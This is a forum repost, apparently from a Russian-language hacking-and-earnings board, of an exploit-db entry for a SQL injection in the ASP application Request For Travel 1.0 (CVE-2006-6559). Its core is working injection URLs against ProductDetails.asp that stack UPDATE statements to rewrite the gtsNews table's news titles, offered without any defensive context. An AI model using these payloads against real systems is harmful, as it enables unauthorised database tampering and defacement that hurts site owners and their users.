Request For Travel 1.0 - 'product' SQL Injection | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 2908

Проверка EDB

Пройдено

Автор: AJANN

Тип уязвимости: WEBAPPS

Платформа: ASP

CVE: cve-2006-6559

Дата публикации: 2006-12-09

Код:

*************************************************************************************
# Title   :  Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# $$$     :  $8,000

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//ProductDetails.asp=[SQL]

Example:
-> All News Title Changed to = "kro"

//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--

-> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]

Источник: www.exploit-db.com

Поиск

Exploit Request For Travel 1.0 - 'product' SQL Injection

Exploiter

Похожие темы